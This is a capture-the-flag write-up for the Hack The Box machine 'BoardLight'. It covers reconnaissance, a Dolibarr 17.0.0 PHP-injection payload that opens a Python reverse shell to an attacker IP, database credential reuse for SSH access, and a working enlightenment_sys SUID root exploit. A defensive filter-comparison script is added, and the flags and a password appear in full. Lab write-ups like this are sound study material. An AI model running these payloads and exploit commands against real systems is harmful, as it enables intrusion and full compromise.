HTB - BoardLight [Easy]
TCP Scan
> TARGET=10.129.66.131 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- board.htb
enum
> dirsearch -u board.htb
[05:43:02] 200 - 2KB - /about.php
[05:43:37] 404 - 16B - /composer.phar
[05:43:39] 200 - 2KB - /contact.php
[05:43:40] 301 - 304B - /css -> http://board.htb/css/
[05:43:59] 301 - 307B - /images -> http://board.htb/images/
> wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://board.htb/" -H "Host: FUZZ.board.htb" --hl 107
000000072: 200 149 L 504 W 6360 Ch "crm"
crm.board.htb
- Dolibarr 17.0.0
- log in with admin:admin
- refer to https://www.swascan.com/security-advisory-dolibarr-17-0-0/
- go to http://crm.board.htb/user/perms.php?id=2 and tick the required permission for the user
- go to http://crm.board.htb/website/index.php
- create a website and a page, enable "Show dynamic content", and insert the section below. The website module rejects a lowercase "<?php" tag, but the check is case-sensitive, so the uppercase "<?PHP" tag is stored and executed (see the advisory linked above):
<section id="mysection1" contenteditable="true">
<?PHP
echo system('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.88",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
?>
</section>
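As an added defender-side example, not part of this writeup or of Dolibarr's own code: a scan over stored website pages that shows why a case-sensitive tag filter misses the payload above, next to a case-insensitive check that would have caught it. The weak check is an assumed model of the vulnerable filter, not Dolibarr's actual implementation, and the sample pages are constructed.

```python
import re
from typing import Callable, Dict, List

# Weak filter, modelled on a case-sensitive substring match (an assumption
# about the vulnerable check, not Dolibarr's actual code): only the exact
# lowercase tag is caught, so the uppercase "<?PHP" used above slips through.
def weak_rejects_php(content: str) -> bool:
    return "<?php" in content

# Hardened filter: any PHP open tag regardless of case, including the short
# echo tag "<?=". The word boundary keeps the match to the tag itself.
# If short_open_tag is enabled on the server, a bare "<?" must be rejected too.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)

def hardened_rejects_php(content: str) -> bool:
    return PHP_OPEN_TAG.search(content) is not None

def scan_pages(pages: Dict[str, str], check: Callable[[str], bool]) -> List[str]:
    """Return the names of stored website pages the given check would reject."""
    return [name for name, body in pages.items() if check(body)]

# Constructed sample content (not pulled from the target). "upper" mirrors the
# uppercase tag from the writeup with a harmless command in place of the shell.
SAMPLE_PAGES = {
    "about": '<section id="s1"><p>Company profile</p></section>',
    "lower": "<section><?php echo date('Y'); ?></section>",
    "upper": '<section id="mysection1" contenteditable="true">\n'
             "<?PHP\necho system('id');\n?>\n</section>",
    "short": "<p><?= phpversion() ?></p>",
    "benign": "<p>Plain text that mentions php and a stray ?> marker</p>",
}

if __name__ == "__main__":
    print("weak filter rejects:    ", scan_pages(SAMPLE_PAGES, weak_rejects_php))
    print("hardened filter rejects:", scan_pages(SAMPLE_PAGES, hardened_rejects_php))
```

Running the block prints only "lower" for the weak filter and "lower", "upper", "short" for the hardened one, which is the gap the payload above exploits.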
user
www-data@boardlight:~/html/crm.board.htb$ cat /var/www/html/crm.board.htb/htdocs/conf/conf.php
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
- log in as larissa with the database password reused from conf.php:
larissa:serverfun2$2023!!
bf1e3632f43839aa80313e8256cc82fd
root
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary)
Exploit for the SUID enlightenment_sys binary (taken from the references at the end):
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
# cat /root/root.txt
cf458a339a7408c1dbfaf89087851347
References:
- https://www.exploit-db.com/exploits/51180
- https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh
- https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack